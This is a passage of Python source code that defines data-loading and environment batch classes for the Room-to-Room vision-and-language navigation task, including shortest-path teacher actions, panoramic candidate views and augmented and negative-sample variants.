res = self.q.get()
return res
def getbatch_fake(self):
if self.one_batch is None:
self.one_batch = self.q.get()
# res = self.q.get()
res = self.one_batch
return res
class R2RBatch_preload_P():
''' Implements the Room to Room navigation task, using discretized viewpoints and pretrained features '''
def __init__(self, feature_store, batch_size=100, seed=10, splits=['train'], tokenizer=None,
name=None):
if feature_store is None:
return
self.env = EnvBatch_T(feature_store=feature_store, batch_size=batch_size)
if feature_store:
self.feature_size = self.env.feature_size
self.data = []
if tokenizer:
self.tok = tokenizer
scans = []
for split in splits:
for item in load_datasets([split]):
# Split multiple instructions into separate entries
for j,instr in enumerate(item['instructions']):
if item['scan'] not in self.env.featurized_scans: # For fast training
continue
new_item = dict(item)
new_item['instr_id'] = '%s_%d' % (item['path_id'], j)
new_item['instructions'] = instr
if tokenizer:
new_item['instr_encoding'] = tokenizer.encode_sentence(instr)
if not tokenizer or new_item['instr_encoding'] is not None:  # Drop items whose instructions failed to encode
self.data.append(new_item)
scans.append(item['scan'])
if name is None:
self.name = splits[0] if len(splits) > 0 else "FAKE"
else:
self.name = name
self.scans = set(scans)
self.splits = splits
self.seed = seed
random.seed(self.seed)
random.shuffle(self.data)
self.q = queue.Queue(100)
self.ix = 0
self.batch_size = batch_size
self._load_nav_graphs()
self.angle_feature = utils.get_all_point_angle_feature()
self.sim = utils.new_simulator()
self.buffered_state_dict = {}
self.batch = None
# In the supervised setup the fake data is identical to the real data
self.fake_data = self.data
print('R2RBatch loaded with %d instructions, using splits: %s' % (len(self.data), ",".join(splits)))
def fetch_data():
while True:
batch = self._getbatch()
self.q.put(batch)
# print('finish')
self.th = threading.Thread(target=fetch_data, daemon=True)  # daemon so the prefetch thread does not block interpreter exit
self.th.start()
def copystate(self, env):
self.env.copystate(env.env)
for name, value in vars(env).items():
if name != 'env':
setattr(self,name,value)
def copyinstance(self):
env_copy = R2RBatch(None)
for name, value in vars(self).items():
if name != 'env':
setattr(env_copy,name,value)
setattr(env_copy,'env',self.env.copyinstance())
return env_copy
def size(self):
return len(self.data)
def _load_nav_graphs(self):
"""
Load the navigation graph for each scan in self.scans.
Store the graph {scan_id: graph} in self.graphs
Store the shortest path {scan_id: {view_id_x: {view_id_y: [path]} } } in self.paths
Store the distances in self.distances. (Structure see above)
Load connectivity graph for each scan, useful for reasoning about shortest paths
:return: None
"""
print('Loading navigation graphs for %d scans' % len(self.scans))
self.graphs = load_nav_graphs(self.scans)
self.paths = {}
for scan, G in self.graphs.items(): # compute all shortest paths
self.paths[scan] = dict(nx.all_pairs_dijkstra_path(G))
self.distances = {}
for scan, G in self.graphs.items(): # compute all shortest paths
self.distances[scan] = dict(nx.all_pairs_dijkstra_path_length(G))
def _next_minibatch(self, tile_one=False, batch_size=None, **kwargs):
"""
Store the minibatch in 'self.batch'
:param tile_one: Tile the one into batch_size
:return: None
"""
if batch_size is None:
batch_size = self.batch_size
if tile_one:
batch = [self.data[self.ix]] * batch_size
self.ix += 1
if self.ix >= len(self.data):
random.shuffle(self.data)
self.ix -= len(self.data)
else:
batch = self.data[self.ix: self.ix+batch_size]
if len(batch) < batch_size:
random.shuffle(self.data)
self.ix = batch_size - len(batch)
batch += self.data[:self.ix]
else:
self.ix += batch_size
self.batch = batch
def reset_epoch(self, shuffle=False):
''' Reset the data index to beginning of epoch. Primarily for testing.
You must still call reset() for a new episode. '''
# if shuffle:
# random.shuffle(self.data)
self.ix = 0
def _shortest_path_action(self, state, goalViewpointId):
''' Determine next action on the shortest path to goal, for supervised training. '''
if state.location.viewpointId == goalViewpointId:
return goalViewpointId # Just stop here
path = self.paths[state.scanId][state.location.viewpointId][goalViewpointId]
nextViewpointId = path[1]
return nextViewpointId
def make_candidate(self, feature, scanId, viewpointId, viewId):
def _loc_distance(loc):
return np.sqrt(loc.rel_heading ** 2 + loc.rel_elevation ** 2)
base_heading = (viewId % 12) * math.radians(30)
adj_dict = {}
long_id = "%s_%s" % (scanId, viewpointId)
if long_id not in self.buffered_state_dict:
for ix in range(36):
if ix == 0:
self.sim.newEpisode(scanId, viewpointId, 0, math.radians(-30))
elif ix % 12 == 0:
self.sim.makeAction(0, 1.0, 1.0)
else:
self.sim.makeAction(0, 1.0, 0)
state = self.sim.getState()
assert state.viewIndex == ix
# Heading and elevation for the viewpoint center
heading = state.heading - base_heading
elevation = state.elevation
visual_feat = feature[ix]
# get adjacent locations
for j, loc in enumerate(state.navigableLocations[1:]):
# if a loc is visible from multiple views, use the closest
# view (in angular distance) as its representation
distance = _loc_distance(loc)
# Heading and elevation for the loc
loc_heading = heading + loc.rel_heading
loc_elevation = elevation + loc.rel_elevation
angle_feat = utils.angle_feature(loc_heading, loc_elevation)
if (loc.viewpointId not in adj_dict or
distance < adj_dict[loc.viewpointId]['distance']):
adj_dict[loc.viewpointId] = {
'heading': loc_heading,
'elevation': loc_elevation,
"normalized_heading": state.heading + loc.rel_heading,
'scanId':scanId,
'viewpointId': loc.viewpointId, # Next viewpoint id
'pointId': ix,
'distance': distance,
'idx': j + 1,
'feature': np.concatenate((visual_feat, angle_feat), -1)
}
candidate = list(adj_dict.values())
self.buffered_state_dict[long_id] = [
{key: c[key]
for key in
['normalized_heading', 'elevation', 'scanId', 'viewpointId',
'pointId', 'idx']}
for c in candidate
]
return candidate
else:
candidate = self.buffered_state_dict[long_id]
candidate_new = []
for c in candidate:
c_new = c.copy()
ix = c_new['pointId']
normalized_heading = c_new['normalized_heading']
visual_feat = feature[ix]
loc_heading = normalized_heading - base_heading
c_new['heading'] = loc_heading
angle_feat = utils.angle_feature(c_new['heading'], c_new['elevation'])
c_new['feature'] = np.concatenate((visual_feat, angle_feat), -1)
c_new.pop('normalized_heading')
candidate_new.append(c_new)
return candidate_new
def _get_obs(self):
obs = []
for i, (feature, state) in enumerate(self.env.getStates()):
item = self.batch[i]
base_view_id = state.viewIndex
# Full features
candidate = self.make_candidate(feature, state.scanId, state.location.viewpointId, state.viewIndex)
# (visual_feature, angle_feature) for views
feature = np.concatenate((feature, self.angle_feature[base_view_id]), -1)
obs.append({
'instr_id' : item['instr_id'],
'scan' : state.scanId,
'viewpoint' : state.location.viewpointId,
'viewIndex' : state.viewIndex,
'heading' : state.heading,
'elevation' : state.elevation,
'feature' : feature,
'candidate': candidate,
'navigableLocations' : state.navigableLocations,
'instructions' : item['instructions'],
'teacher' : self._shortest_path_action(state, item['path'][-1]),
'path_id' : item['path_id']
})
if 'instr_encoding' in item:
obs[-1]['instr_encoding'] = item['instr_encoding']
# A2C reward. The negative distance between the state and the final state
obs[-1]['distance'] = self.distances[state.scanId][state.location.viewpointId][item['path'][-1]]
return obs
def reset(self, batch=None, inject=False, **kwargs):
''' Load a new minibatch / episodes. '''
if batch is None: # Allow the user to explicitly define the batch
self._next_minibatch(**kwargs)
else:
if inject: # Inject the batch into the next minibatch
self._next_minibatch(**kwargs)
self.batch[:len(batch)] = batch
else: # Else set the batch to the current batch
self.batch = batch
scanIds = [item['scan'] for item in self.batch]
viewpointIds = [item['path'][0] for item in self.batch]
headings = [item['heading'] for item in self.batch]
self.env.newEpisodes(scanIds, viewpointIds, headings)
return self._get_obs()
def reset_fake(self, batch=None, inject=False, **kwargs):
# ''' Load a new minibatch / episodes. '''
if self.batch is None: # Allow the user to explicitly define the batch
self._next_minibatch(**kwargs)
# else:
# if inject: # Inject the batch into the next minibatch
# self._next_minibatch(**kwargs)
# self.batch[:len(batch)] = batch
# else: # Else set the batch to the current batch
# self.batch = batch
scanIds = [item['scan'] for item in self.batch]
viewpointIds = [item['path'][0] for item in self.batch]
headings = [item['heading'] for item in self.batch]
self.env.newEpisodes(scanIds, viewpointIds, headings)
return self._get_obs()
def step(self, actions):
''' Take action (same interface as makeActions) '''
self.env.makeActions(actions)
return self._get_obs()
def get_statistics(self):
stats = {}
length = 0
path = 0
for datum in self.data:
length += len(self.tok.split_sentence(datum['instructions']))
path += self.distances[datum['scan']][datum['path'][0]][datum['path'][-1]]
stats['length'] = length / len(self.data)
stats['path'] = path / len(self.data)
return stats
def make_equiv_action(self, a_t, perm_obs):
"""
Interface between Panoramic view and Egocentric view
It converts the panoramic-view action a_t into the equivalent egocentric-view actions for the simulator
"""
env_actions = {
'left': (0,-1, 0), # left
'right': (0, 1, 0), # right
'up': (0, 0, 1), # up
'down': (0, 0,-1), # down
'forward': (1, 0, 0), # forward
'<end>': (0, 0, 0), # <end>
'<start>': (0, 0, 0), # <start>
'<ignore>': (0, 0, 0) # <ignore>
}
def take_action(i, idx, name):
if type(name) is int: # Go to the next view
self.env.sims[idx].makeAction(name, 0, 0)
else: # Adjust
self.env.sims[idx].makeAction(*env_actions[name])
perm_idx = range(len(perm_obs))
for i, idx in enumerate(perm_idx):
action = a_t[i]
if action != -1: # -1 is the <stop> action
select_candidate = perm_obs[i]['candidate'][action]
src_point = perm_obs[i]['viewIndex']
trg_point = select_candidate['pointId']
src_level = (src_point ) // 12  # view indices start at 0; 12 heading slots per elevation level
trg_level = (trg_point ) // 12
# print(src_level, trg_level, self.env.sims[idx].getState().viewIndex, trg_point)
while src_level < trg_level: # Tune up
take_action(i, idx, 'up')
src_level += 1
while src_level > trg_level: # Tune down
take_action(i, idx, 'down')
src_level -= 1
# print('yes')
while self.env.sims[idx].getState().viewIndex != trg_point: # Turn right until the target
take_action(i, idx, 'right')
# print(self.env.sims[idx].getState().viewIndex)
assert select_candidate['viewpointId'] == \
self.env.sims[idx].getState().navigableLocations[select_candidate['idx']].viewpointId
take_action(i, idx, select_candidate['idx'])
def _teacher_action(self, obs, ended):
"""
Extract teacher actions into variable.
:param obs: The observation.
:param ended: Whether the action seq is ended
:return:
"""
a = np.zeros(len(obs), dtype=np.int64)
for i, ob in enumerate(obs):
if ended[i]: # Just ignore this index
a[i] = args.ignoreid
else:
for k, candidate in enumerate(ob['candidate']):
if candidate['viewpointId'] == ob['teacher']: # Next view point
a[i] = k
break
else: # Stop here
assert ob['teacher'] == ob['viewpoint'] # The teacher action should be "STAY HERE"
a[i] = len(ob['candidate'])
return a
def _getbatch(self):
obs = np.array(self.reset())
ended = np.array([False] * self.batch_size)  # Indices match permutation of the model, not env
length = 10
obs_list = []
# obs_list.append(obs)
exp_list = []
action_list = []
for t in range(length):
candidate_batch = []
mask_batch = []
scanIds = [ob['scan'] for ob in obs]
viewpoints = [ob['viewpoint'] for ob in obs]
headings = [ob['heading'] for ob in obs]
elevations = [ob['elevation'] for ob in obs]
candidate_leng = [len(ob['candidate']) for ob in obs]
max_length = max(candidate_leng)
for i in range(max_length):
a = np.zeros(len(obs), dtype=np.int64)
mask = np.zeros(len(obs), dtype=np.int64)
for j, ob in enumerate(obs):
if i >= len(ob['candidate']):
a[j] = -1
else:
a[j] = i
mask[j] = 1
self.env.make_equiv_action(a, obs)
obs_cand = np.array(self._get_obs())
candidate_batch.append(obs_cand)
mask_batch.append(mask)
self.env.newEpisodes(scanIds,viewpoints,headings,elevations)
candidate_batch = np.array(candidate_batch).transpose() # batch x max_cand_length (obs)
mask_batch = np.array(mask_batch).transpose() # batch x max_cand_length (mask)
a_t = self._teacher_action(obs, ended)
obs_list.append(obs)
exp_list.append((candidate_batch, mask_batch))
action_list.append(np.array(a_t))
for i, next_id in enumerate(a_t):
if next_id == candidate_leng[i] or next_id == args.ignoreid: # The last action is <end>
a_t[i] = -1 # Change the <end> and ignore action to -1
if ended.all():
break
self.env.make_equiv_action(a_t, obs)
obs = np.array(self._get_obs())
ended[:] = np.logical_or(ended, (a_t == -1))
# assert len(obs_list) == len(exp_list)
return obs_list, exp_list, action_list
def getbatch(self):
res = self.q.get()
return res
class R2RBatch_P():
''' Implements the Room to Room navigation task, using discretized viewpoints and pretrained features '''
def __init__(self, feature_store, batch_size=100, seed=10, splits=['train'], tokenizer=None,
name=None):
if feature_store is None:
return
self.env = EnvBatch_P(feature_store=feature_store, batch_size=batch_size)
if feature_store:
self.feature_size = self.env.feature_size
self.data = []
if tokenizer:
self.tok = tokenizer
scans = []
for split in splits:
for item in load_datasets([split]):
# Split multiple instructions into separate entries
for j,instr in enumerate(item['instructions']):
if item['scan'] not in self.env.featurized_scans: # For fast training
continue
new_item = dict(item)
new_item['instr_id'] = '%s_%d' % (item['path_id'], j)
new_item['instructions'] = instr
if tokenizer:
new_item['instr_encoding'] = tokenizer.encode_sentence(instr)
if not tokenizer or new_item['instr_encoding'] is not None:  # Drop items whose instructions failed to encode
self.data.append(new_item)
scans.append(item['scan'])
if name is None:
self.name = splits[0] if len(splits) > 0 else "FAKE"
else:
self.name = name
self.scans = set(scans)
self.splits = splits
self.seed = seed
random.seed(self.seed)
random.shuffle(self.data)
self.ix = 0
self.batch_size = batch_size
self._load_nav_graphs()
self.angle_feature = utils.get_all_point_angle_feature()
self.sim = utils.new_simulator()
self.buffered_state_dict = {}
self.batch = None
# In the supervised setup the fake data is identical to the real data
self.fake_data = self.data
print('R2RBatch loaded with %d instructions, using splits: %s' % (len(self.data), ",".join(splits)))
def copystate(self, env):
self.env.copystate(env.env)
for name, value in vars(env).items():
if name != 'env':
setattr(self,name,value)
def copyinstance(self):
env_copy = R2RBatch(None)
for name, value in vars(self).items():
if name != 'env':
setattr(env_copy,name,value)
setattr(env_copy,'env',self.env.copyinstance())
return env_copy
def size(self):
return len(self.data)
def _load_nav_graphs(self):
"""
Load the navigation graph for each scan in self.scans.
Store the graph {scan_id: graph} in self.graphs
Store the shortest path {scan_id: {view_id_x: {view_id_y: [path]} } } in self.paths
Store the distances in self.distances. (Structure see above)
Load connectivity graph for each scan, useful for reasoning about shortest paths
:return: None
"""
print('Loading navigation graphs for %d scans' % len(self.scans))
self.graphs = load_nav_graphs(self.scans)
self.paths = {}
for scan, G in self.graphs.items(): # compute all shortest paths
self.paths[scan] = dict(nx.all_pairs_dijkstra_path(G))
self.distances = {}
for scan, G in self.graphs.items(): # compute all shortest paths
self.distances[scan] = dict(nx.all_pairs_dijkstra_path_length(G))
def _next_minibatch(self, tile_one=False, batch_size=None, **kwargs):
"""
Store the minibatch in 'self.batch'
:param tile_one: Tile the one into batch_size
:return: None
"""
if batch_size is None:
batch_size = self.batch_size
if tile_one:
batch = [self.data[self.ix]] * batch_size
self.ix += 1
if self.ix >= len(self.data):
random.shuffle(self.data)
self.ix -= len(self.data)
else:
batch = self.data[self.ix: self.ix+batch_size]
if len(batch) < batch_size:
random.shuffle(self.data)
self.ix = batch_size - len(batch)
batch += self.data[:self.ix]
else:
self.ix += batch_size
self.batch = batch
def reset_epoch(self, shuffle=False):
''' Reset the data index to beginning of epoch. Primarily for testing.
You must still call reset() for a new episode. '''
# if shuffle:
# random.shuffle(self.data)
self.ix = 0
def _shortest_path_action(self, state, goalViewpointId):
''' Determine next action on the shortest path to goal, for supervised training. '''
if state.location.viewpointId == goalViewpointId:
return goalViewpointId # Just stop here
path = self.paths[state.scanId][state.location.viewpointId][goalViewpointId]
nextViewpointId = path[1]
return nextViewpointId
def make_candidate(self, feature, scanId, viewpointId, viewId):
def _loc_distance(loc):
return np.sqrt(loc.rel_heading ** 2 + loc.rel_elevation ** 2)
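        # The panorama is discretized into 36 views (12 headings x 3 elevations,
        # 30 degrees apart); viewId % 12 is the current heading index. The loop
        # below sweeps all 36 views starting from elevation -30 degrees, rotating
        # right one step at a time and tilting up after every 12 views.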
base_heading = (viewId % 12) * math.radians(30)
adj_dict = {}
long_id = "%s_%s" % (scanId, viewpointId)
if long_id not in self.buffered_state_dict:
for ix in range(36):
if ix == 0:
self.sim.newEpisode(scanId, viewpointId, 0, math.radians(-30))
elif ix % 12 == 0:
self.sim.makeAction(0, 1.0, 1.0)
else:
self.sim.makeAction(0, 1.0, 0)
state = self.sim.getState()
assert state.viewIndex == ix
# Heading and elevation for the viewpoint center
heading = state.heading - base_heading
elevation = state.elevation
visual_feat = feature[ix]
# get adjacent locations
for j, loc in enumerate(state.navigableLocations[1:]):
                    # If a loc is visible from multiple views, use the closest
                    # view (in angular distance) as its representation.
                    distance = _loc_distance(loc)
                    # Heading and elevation for the loc
loc_heading = heading + loc.rel_heading
loc_elevation = elevation + loc.rel_elevation
angle_feat = utils.angle_feature(loc_heading, loc_elevation)
if (loc.viewpointId not in adj_dict or
distance < adj_dict[loc.viewpointId]['distance']):
adj_dict[loc.viewpointId] = {
'heading': loc_heading,
'elevation': loc_elevation,
"normalized_heading": state.heading + loc.rel_heading,
'scanId':scanId,
'viewpointId': loc.viewpointId, # Next viewpoint id
'pointId': ix,
'distance': distance,
'idx': j + 1,
'feature': np.concatenate((visual_feat, angle_feat), -1)
}
candidate = list(adj_dict.values())
self.buffered_state_dict[long_id] = [
{key: c[key]
for key in
['normalized_heading', 'elevation', 'scanId', 'viewpointId',
'pointId', 'idx']}
for c in candidate
]
return candidate
else:
candidate = self.buffered_state_dict[long_id]
candidate_new = []
for c in candidate:
c_new = c.copy()
ix = c_new['pointId']
normalized_heading = c_new['normalized_heading']
visual_feat = feature[ix]
loc_heading = normalized_heading - base_heading
c_new['heading'] = loc_heading
angle_feat = utils.angle_feature(c_new['heading'], c_new['elevation'])
c_new['feature'] = np.concatenate((visual_feat, angle_feat), -1)
c_new.pop('normalized_heading')
candidate_new.append(c_new)
return candidate_new
def _get_obs(self):
obs = []
for i, (feature, state) in enumerate(self.env.getStates()):
item = self.batch[i]
base_view_id = state.viewIndex
# Full features
candidate = self.make_candidate(feature, state.scanId, state.location.viewpointId, state.viewIndex)
            # (visual_feature, angle_feature) for views
feature = np.concatenate((feature, self.angle_feature[base_view_id]), -1)
obs.append({
'instr_id' : item['instr_id'],
'scan' : state.scanId,
'viewpoint' : state.location.viewpointId,
'viewIndex' : state.viewIndex,
'heading' : state.heading,
'elevation' : state.elevation,
'feature' : feature,
'candidate': candidate,
'navigableLocations' : state.navigableLocations,
'instructions' : item['instructions'],
'teacher' : self._shortest_path_action(state, item['path'][-1]),
'path_id' : item['path_id']
})
if 'instr_encoding' in item:
obs[-1]['instr_encoding'] = item['instr_encoding']
# A2C reward. The negative distance between the state and the final state
obs[-1]['distance'] = self.distances[state.scanId][state.location.viewpointId][item['path'][-1]]
return obs
def reset(self, batch=None, inject=False, **kwargs):
''' Load a new minibatch / episodes. '''
if batch is None: # Allow the user to explicitly define the batch
self._next_minibatch(**kwargs)
else:
if inject: # Inject the batch into the next minibatch
self._next_minibatch(**kwargs)
self.batch[:len(batch)] = batch
else: # Else set the batch to the current batch
self.batch = batch
scanIds = [item['scan'] for item in self.batch]
viewpointIds = [item['path'][0] for item in self.batch]
headings = [item['heading'] for item in self.batch]
self.env.newEpisodes(scanIds, viewpointIds, headings)
return self._get_obs()
def reset_fake(self, batch=None, inject=False, **kwargs):
        ''' Like reset(), but only samples a new minibatch when none has been loaded yet. '''
        if self.batch is None:  # Reuse the already-loaded batch if there is one
self._next_minibatch(**kwargs)
# else:
# if inject: # Inject the batch into the next minibatch
# self._next_minibatch(**kwargs)
# self.batch[:len(batch)] = batch
# else: # Else set the batch to the current batch
# self.batch = batch
scanIds = [item['scan'] for item in self.batch]
viewpointIds = [item['path'][0] for item in self.batch]
headings = [item['heading'] for item in self.batch]
self.env.newEpisodes(scanIds, viewpointIds, headings)
return self._get_obs()
def step(self, actions):
''' Take action (same interface as makeActions) '''
self.env.makeActions(actions)
return self._get_obs()
def get_statistics(self):
stats = {}
length = 0
path = 0
for datum in self.data:
length += len(self.tok.split_sentence(datum['instructions']))
path += self.distances[datum['scan']][datum['path'][0]][datum['path'][-1]]
stats['length'] = length / len(self.data)
stats['path'] = path / len(self.data)
return stats
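# A minimal usage sketch for R2RBatch (illustrative only; the feature store and
# tokenizer objects are assumed to come from the surrounding codebase):
#
#   env = R2RBatch(feature_store, batch_size=64, splits=['train'], tokenizer=tok)
#   obs = env.reset()          # sample a minibatch and start new episodes
#   obs = env.step(actions)    # same interface as the simulator's makeActions
#   print(env.get_statistics())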
class R2RBatch_aug():
''' Implements the Room to Room navigation task, using discretized viewpoints and pretrained features '''
def __init__(self, feature_store, batch_size=100, seed=10, splits=['train'], tokenizer=None,
name=None):
self.env = EnvBatch(feature_store=feature_store, batch_size=batch_size)
if feature_store:
self.feature_size = self.env.feature_size
self.data = []
if tokenizer:
self.tok = tokenizer
scans = []
for split in splits:
for item in load_datasets([split]):
# Split multiple instructions into separate entries
for j,instr in enumerate(item['instructions']):
if item['scan'] not in self.env.featurized_scans: # For fast training
continue
new_item = dict(item)
new_item['instr_id'] = '%s_%d' % (item['path_id'], j)
new_item['instructions'] = instr
if tokenizer:
new_item['instr_encoding'] = tokenizer.encode_sentence(instr)
                    if not tokenizer or new_item['instr_encoding'] is not None:  # Skip items whose instructions could not be encoded
self.data.append(new_item)
scans.append(item['scan'])
if name is None:
self.name = splits[0] if len(splits) > 0 else "FAKE"
else:
self.name = name
self.scans = set(scans)
self.splits = splits
self.seed = seed
random.seed(self.seed)
random.shuffle(self.data)
self.ix = 0
self.batch_size = batch_size
self._load_nav_graphs()
self.angle_feature = utils.get_all_point_angle_feature()
self.sim = utils.new_simulator()
self.buffered_state_dict = {}
        # In the supervised setup the fake data is identical to the real data
self.fake_data = self.data
        print('R2RBatch_aug loaded with %d instructions, using splits: %s' % (len(self.data), ",".join(splits)))
def size(self):
return len(self.data)
def _load_nav_graphs(self):
"""
load graph from self.scan,
Store the graph {scan_id: graph} in self.graphs
Store the shortest path {scan_id: {view_id_x: {view_id_y: [path]} } } in self.paths
Store the distances in self.distances. (Structure see above)
Load connectivity graph for each scan, useful for reasoning about shortest paths
:return: None
"""
print('Loading navigation graphs for %d scans' % len(self.scans))
self.graphs = load_nav_graphs(self.scans)
self.paths = {}
for scan, G in self.graphs.items(): # compute all shortest paths
self.paths[scan] = dict(nx.all_pairs_dijkstra_path(G))
self.distances = {}
for scan, G in self.graphs.items(): # compute all shortest paths
self.distances[scan] = dict(nx.all_pairs_dijkstra_path_length(G))
def _next_minibatch(self, tile_one=False, batch_size=None, **kwargs):
"""
Store the minibach in 'self.batch'
:param tile_one: Tile the one into batch_size
:return: None
"""
if batch_size is None:
batch_size = self.batch_size
if tile_one:
batch = [self.data[self.ix]] * batch_size
self.ix += 1
if self.ix >= len(self.data):
random.shuffle(self.data)
self.ix -= len(self.data)
else:
batch = self.data[self.ix: self.ix+batch_size]
if len(batch) < batch_size:
random.shuffle(self.data)
self.ix = batch_size - len(batch)
batch += self.data[:self.ix]
else:
self.ix += batch_size
self.batch = batch
def reset_epoch(self, shuffle=False):
''' Reset the data index to beginning of epoch. Primarily for testing.
You must still call reset() for a new episode. '''
if shuffle:
random.shuffle(self.data)
self.ix = 0
def _shortest_path_action(self, state, goalViewpointId):
''' Determine next action on the shortest path to goal, for supervised training. '''
if state.location.viewpointId == goalViewpointId:
return goalViewpointId # Just stop here
path = self.paths[state.scanId][state.location.viewpointId][goalViewpointId]
nextViewpointId = path[1]
return nextViewpointId
def make_candidate(self, feature, scanId, viewpointId, viewId):
def _loc_distance(loc):
return np.sqrt(loc.rel_heading ** 2 + loc.rel_elevation ** 2)
base_heading = (viewId % 12) * math.radians(30)
adj_dict = {}
long_id = "%s_%s" % (scanId, viewpointId)
if long_id not in self.buffered_state_dict:
for ix in range(36):
if ix == 0:
self.sim.newEpisode(scanId, viewpointId, 0, math.radians(-30))
elif ix % 12 == 0:
self.sim.makeAction(0, 1.0, 1.0)
else:
self.sim.makeAction(0, 1.0, 0)
state = self.sim.getState()
assert state.viewIndex == ix
# Heading and elevation for the viewpoint center
heading = state.heading - base_heading
elevation = state.elevation
visual_feat = feature[ix]
# get adjacent locations
for j, loc in enumerate(state.navigableLocations[1:]):
                    # If a loc is visible from multiple views, use the closest
                    # view (in angular distance) as its representation.
                    distance = _loc_distance(loc)
                    # Heading and elevation for the loc
loc_heading = heading + loc.rel_heading
loc_elevation = elevation + loc.rel_elevation
angle_feat = utils.angle_feature(loc_heading, loc_elevation)
if (loc.viewpointId not in adj_dict or
distance < adj_dict[loc.viewpointId]['distance']):
adj_dict[loc.viewpointId] = {
'heading': loc_heading,
'elevation': loc_elevation,
"normalized_heading": state.heading + loc.rel_heading,
'scanId':scanId,
'viewpointId': loc.viewpointId, # Next viewpoint id
'pointId': ix,
'distance': distance,
'idx': j + 1,
'feature': np.concatenate((visual_feat, angle_feat), -1)
}
candidate = list(adj_dict.values())
self.buffered_state_dict[long_id] = [
{key: c[key]
for key in
['normalized_heading', 'elevation', 'scanId', 'viewpointId',
'pointId', 'idx']}
for c in candidate
]
return candidate
else:
candidate = self.buffered_state_dict[long_id]
candidate_new = []
for c in candidate:
c_new = c.copy()
ix = c_new['pointId']
normalized_heading = c_new['normalized_heading']
visual_feat = feature[ix]
loc_heading = normalized_heading - base_heading
c_new['heading'] = loc_heading
angle_feat = utils.angle_feature(c_new['heading'], c_new['elevation'])
c_new['feature'] = np.concatenate((visual_feat, angle_feat), -1)
c_new.pop('normalized_heading')
candidate_new.append(c_new)
return candidate_new
def _get_obs(self):
obs = []
for i, (feature, state) in enumerate(self.env.getStates()):
item = self.batch[i]
base_view_id = state.viewIndex
# Full features
candidate = self.make_candidate(feature, state.scanId, state.location.viewpointId, state.viewIndex)
            # (visual_feature, angle_feature) for views
feature = np.concatenate((feature, self.angle_feature[base_view_id]), -1)
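            # The teacher action follows the annotated path: pick the viewpoint
            # right after the current one on item['path'], or the final viewpoint
            # if the agent has stepped off the path.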
path = item['path']
vp = state.location.viewpointId
nxp = None
for j,p in enumerate(path[1:]):
if path[j] == vp:
nxp = p
break
if nxp is None:
nxp = path[-1]
obs.append({
'instr_id' : item['instr_id'],
'scan' : state.scanId,
'viewpoint' : state.location.viewpointId,
'viewIndex' : state.viewIndex,
'heading' : state.heading,
'elevation' : state.elevation,
'feature' : feature,
'candidate': candidate,
'navigableLocations' : state.navigableLocations,
'instructions' : item['instructions'],
'teacher' : self._shortest_path_action(state, nxp),
'path_id' : item['path_id']
})
if 'instr_encoding' in item:
obs[-1]['instr_encoding'] = item['instr_encoding']
# A2C reward. The negative distance between the state and the final state
obs[-1]['distance'] = self.distances[state.scanId][state.location.viewpointId][item['path'][-1]]
return obs
def reset(self, batch=None, inject=False, **kwargs):
''' Load a new minibatch / episodes. '''
if batch is None: # Allow the user to explicitly define the batch
self._next_minibatch(**kwargs)
else:
if inject: # Inject the batch into the next minibatch
self._next_minibatch(**kwargs)
self.batch[:len(batch)] = batch
else: # Else set the batch to the current batch
self.batch = batch
scanIds = [item['scan'] for item in self.batch]
viewpointIds = [item['path'][0] for item in self.batch]
headings = [item['heading'] for item in self.batch]
self.env.newEpisodes(scanIds, viewpointIds, headings)
return self._get_obs()
def step(self, actions):
''' Take action (same interface as makeActions) '''
self.env.makeActions(actions)
return self._get_obs()
def get_statistics(self):
stats = {}
length = 0
path = 0
for datum in self.data:
length += len(self.tok.split_sentence(datum['instructions']))
path += self.distances[datum['scan']][datum['path'][0]][datum['path'][-1]]
stats['length'] = length / len(self.data)
stats['path'] = path / len(self.data)
return stats
class R2RBatch_neg():
''' Implements the Room to Room navigation task, using discretized viewpoints and pretrained features '''
def __init__(self, feature_store, batch_size=100, seed=10, splits=['train'], tokenizer=None,
name=None):
self.env = EnvBatch(feature_store=feature_store, batch_size=batch_size)
if feature_store:
self.feature_size = self.env.feature_size
self.data = []
if tokenizer:
self.tok = tokenizer
scans = []
self.scan_specific_data = {}
for split in splits:
for item in load_datasets([split]):
# Split multiple instructions into separate entries
for j,instr in enumerate(item['instructions']):
if item['scan'] not in self.env.featurized_scans: # For fast training
continue
new_item = dict(item)
new_item['instr_id'] = '%s_%d' % (item['path_id'], j)
new_item['instructions'] = instr
if tokenizer:
new_item['instr_encoding'] = tokenizer.encode_sentence(instr)
                    if not tokenizer or new_item['instr_encoding'] is not None:  # Skip items whose instructions could not be encoded
self.data.append(new_item)
if not item['scan'] in self.scan_specific_data:
self.scan_specific_data[item['scan']] = []
self.scan_specific_data[item['scan']].append(new_item)
scans.append(item['scan'])
if name is None:
self.name = splits[0] if len(splits) > 0 else "FAKE"
else:
self.name = name
self.scans = set(scans)
self.splits = splits
self.seed = seed
random.seed(self.seed)
random.shuffle(self.data)
self.ix = 0
self.batch_size = batch_size
self._load_nav_graphs()
self.angle_feature = utils.get_all_point_angle_feature()
self.sim = utils.new_simulator()
# self.buffered_state_dict = {}
        # In the supervised setup the fake data is identical to the real data
self.fake_data = self.data
print('R2RBatch_neg loaded with %d instructions, using splits: %s' % (len(self.data), ",".join(splits)))
def size(self):
return len(self.data)
def _load_nav_graphs(self):
"""
load graph from self.scan,
Store the graph {scan_id: graph} in self.graphs
Store the shortest path {scan_id: {view_id_x: {view_id_y: [path]} } } in self.paths
Store the distances in self.distances. (Structure see above)
Load connectivity graph for each scan, useful for reasoning about shortest paths
:return: None
"""
print('Loading navigation graphs for %d scans' % len(self.scans))
self.graphs = load_nav_graphs(self.scans)
self.paths = {}
for scan, G in self.graphs.items(): # compute all shortest paths
self.paths[scan] = dict(nx.all_pairs_dijkstra_path(G))
self.distances = {}
for scan, G in self.graphs.items(): # compute all shortest paths
self.distances[scan] = dict(nx.all_pairs_dijkstra_path_length(G))
def _next_minibatch(self, tile_one=False, batch_size=None, **kwargs):
"""
Store the minibach in 'self.batch'
:param tile_one: Tile the one into batch_size
:return: None
"""
if batch_size is None:
batch_size = self.batch_size
if tile_one:
batch = [self.data[self.ix]] * batch_size
self.ix += 1
if self.ix >= len(self.data):
random.shuffle(self.data)
self.ix -= len(self.data)
else:
batch = self.data[self.ix: self.ix+batch_size]
if len(batch) < batch_size:
random.shuffle(self.data)
self.ix = batch_size - len(batch)
batch += self.data[:self.ix]
else:
self.ix += batch_size
self.batch = deepcopy(batch)
self.start_list = []
self.dest_list = []
self.fake_start_list = []
self.fake_dest_list = []
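        # Build negative trajectories: for each item, search for a goal whose
        # shortest path from the true start has the same number of nodes
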